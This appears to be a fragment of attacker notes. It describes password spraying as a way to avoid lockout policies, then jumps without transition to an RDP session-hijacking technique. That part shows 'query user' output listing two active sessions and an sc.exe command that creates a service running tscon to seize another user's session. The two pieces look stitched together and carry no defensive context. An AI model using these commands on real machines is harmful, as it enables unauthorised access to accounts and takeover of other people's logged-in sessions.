We can try to brute force credentials but a much much better way is to use password-spraying
It works by attempting a single password against multiple usernames before moving on to another password. This can help avoid triggering a password lockout policy.
query user
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>me rdp-tcp#13 1 Active 7 8/25/2021 1:23 AM
tommy rdp-tcp#14 2 Active * 8/25/2021 1:28 AM
sc.exe hijacksession binpath= 'cmd.exe /k tscon 2 /dest:rdp-tcp#13'